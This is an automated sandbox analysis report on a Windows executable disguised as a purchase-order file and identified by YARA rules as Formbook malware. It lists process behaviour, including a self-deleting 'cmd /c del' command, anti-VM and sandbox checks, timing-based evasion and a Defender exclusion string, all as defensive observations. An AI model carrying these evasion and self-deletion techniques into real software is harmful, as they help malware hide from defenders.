          Source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.PO-RFQ # 097663899.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.PO-RFQ # 097663899.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.PO-RFQ # 097663899.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.PO-RFQ # 097663899.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: PO-RFQ # 097663899.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@14/8
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO-RFQ # 097663899.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:800:120:WilError_01
          Source: PO-RFQ # 097663899.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: PO-RFQ # 097663899.exeVirustotal: Detection: 30%
          Source: PO-RFQ # 097663899.exeReversingLabs: Detection: 27%
          Source: unknownProcess created: C:\Users\user\Desktop\PO-RFQ # 097663899.exe 'C:\Users\user\Desktop\PO-RFQ # 097663899.exe'
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess created: C:\Users\user\Desktop\PO-RFQ # 097663899.exe C:\Users\user\Desktop\PO-RFQ # 097663899.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO-RFQ # 097663899.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess created: C:\Users\user\Desktop\PO-RFQ # 097663899.exe C:\Users\user\Desktop\PO-RFQ # 097663899.exeJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO-RFQ # 097663899.exe'Jump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: PO-RFQ # 097663899.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: PO-RFQ # 097663899.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: systray.pdb source: PO-RFQ # 097663899.exe, 00000004.00000002.295144212.0000000000BE8000.00000004.00000020.sdmp
          Source: Binary string: systray.pdbGCTL source: PO-RFQ # 097663899.exe, 00000004.00000002.295144212.0000000000BE8000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO-RFQ # 097663899.exe, 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, systray.exe, 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO-RFQ # 097663899.exe, systray.exe
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_004150D0 push ebp; iretd 4_2_004150D1
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00408A04 push esi; ret 4_2_00408A05
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00415BF3 pushfd ; ret 4_2_00415BF4
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041B3B5 push eax; ret 4_2_0041B408
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041B46C push eax; ret 4_2_0041B472
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041B402 push eax; ret 4_2_0041B408
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041B40B push eax; ret 4_2_0041B472
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041559C push edx; retf 4_2_004155BA
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041BF6A push ecx; ret 4_2_0041C07B
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_004157F7 push ss; ret 4_2_0041580C
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EFD0D1 push ecx; ret 4_2_00EFD0E4
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050CD0D1 push ecx; ret 14_2_050CD0E4
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030EB3B5 push eax; ret 14_2_030EB408
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E5BF3 pushfd ; ret 14_2_030E5BF4
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030D8A04 push esi; ret 14_2_030D8A05
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E50D0 push ebp; iretd 14_2_030E50D1
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030EBFD3 push ecx; ret 14_2_030EC07B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E57F7 push ss; ret 14_2_030E580C
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E559C push edx; retf 14_2_030E55BA
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030EB40B push eax; ret 14_2_030EB472
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030EB402 push eax; ret 14_2_030EB408
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030EB46C push eax; ret 14_2_030EB472
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85500503575
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: PO-RFQ # 097663899.exe PID: 5964, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 00000000030D85E4 second address: 00000000030D85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 00000000030D897E second address: 00000000030D8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_004088B0 rdtsc 4_2_004088B0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exe TID: 5988Thread sleep time: -101015s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exe TID: 4896Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6300Thread sleep time: -55000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\systray.exe TID: 5344Thread sleep time: -42000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeThread delayed: delay time: 101015Jump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000006.00000000.277718252.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000006.00000000.260289089.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.277238129.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.260342638.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000006.00000002.494269360.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.277772773.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000006.00000002.506618917.00000000053D7000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000006.00000000.277238129.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000006.00000000.277238129.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000006.00000000.277772773.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000006.00000000.277238129.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_004088B0 rdtsc 4_2_004088B0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00409B20 LdrLoadDll,4_2_00409B20
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F26CF0 mov eax, dword ptr fs:[00000030h]4_2_00F26CF0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F26CF0 mov eax, dword ptr fs:[00000030h]4_2_00F26CF0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F26CF0 mov eax, dword ptr fs:[00000030h]4_2_00F26CF0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA58EC mov eax, dword ptr fs:[00000030h]4_2_00EA58EC
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F614FB mov eax, dword ptr fs:[00000030h]4_2_00F614FB
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F78CD6 mov eax, dword ptr fs:[00000030h]4_2_00F78CD6
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F3B8D0 mov eax, dword ptr fs:[00000030h]4_2_00F3B8D0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F3B8D0 mov ecx, dword ptr fs:[00000030h]4_2_00F3B8D0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F3B8D0 mov eax, dword ptr fs:[00000030h]4_2_00F3B8D0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F3B8D0 mov eax, dword ptr fs:[00000030h]4_2_00F3B8D0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F3B8D0 mov eax, dword ptr fs:[00000030h]4_2_00F3B8D0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F3B8D0 mov eax, dword ptr fs:[00000030h]4_2_00F3B8D0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE90AF mov eax, dword ptr fs:[00000030h]4_2_00EE90AF
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED20A0 mov eax, dword ptr fs:[00000030h]4_2_00ED20A0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED20A0 mov eax, dword ptr fs:[00000030h]4_2_00ED20A0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED20A0 mov eax, dword ptr fs:[00000030h]4_2_00ED20A0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED20A0 mov eax, dword ptr fs:[00000030h]4_2_00ED20A0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED20A0 mov eax, dword ptr fs:[00000030h]4_2_00ED20A0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED20A0 mov eax, dword ptr fs:[00000030h]4_2_00ED20A0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDF0BF mov ecx, dword ptr fs:[00000030h]4_2_00EDF0BF
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDF0BF mov eax, dword ptr fs:[00000030h]4_2_00EDF0BF
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDF0BF mov eax, dword ptr fs:[00000030h]4_2_00EDF0BF
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA9080 mov eax, dword ptr fs:[00000030h]4_2_00EA9080
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB849B mov eax, dword ptr fs:[00000030h]4_2_00EB849B
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F23884 mov eax, dword ptr fs:[00000030h]4_2_00F23884
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F23884 mov eax, dword ptr fs:[00000030h]4_2_00F23884
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EC746D mov eax, dword ptr fs:[00000030h]4_2_00EC746D
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F71074 mov eax, dword ptr fs:[00000030h]4_2_00F71074
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F62073 mov eax, dword ptr fs:[00000030h]4_2_00F62073
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F3C450 mov eax, dword ptr fs:[00000030h]4_2_00F3C450
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F3C450 mov eax, dword ptr fs:[00000030h]4_2_00F3C450
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDA44B mov eax, dword ptr fs:[00000030h]4_2_00EDA44B
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EC0050 mov eax, dword ptr fs:[00000030h]4_2_00EC0050
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EC0050 mov eax, dword ptr fs:[00000030h]4_2_00EC0050
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED002D mov eax, dword ptr fs:[00000030h]4_2_00ED002D
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED002D mov eax, dword ptr fs:[00000030h]4_2_00ED002D
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED002D mov eax, dword ptr fs:[00000030h]4_2_00ED002D
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED002D mov eax, dword ptr fs:[00000030h]4_2_00ED002D
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED002D mov eax, dword ptr fs:[00000030h]4_2_00ED002D
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBB02A mov eax, dword ptr fs:[00000030h]4_2_00EBB02A
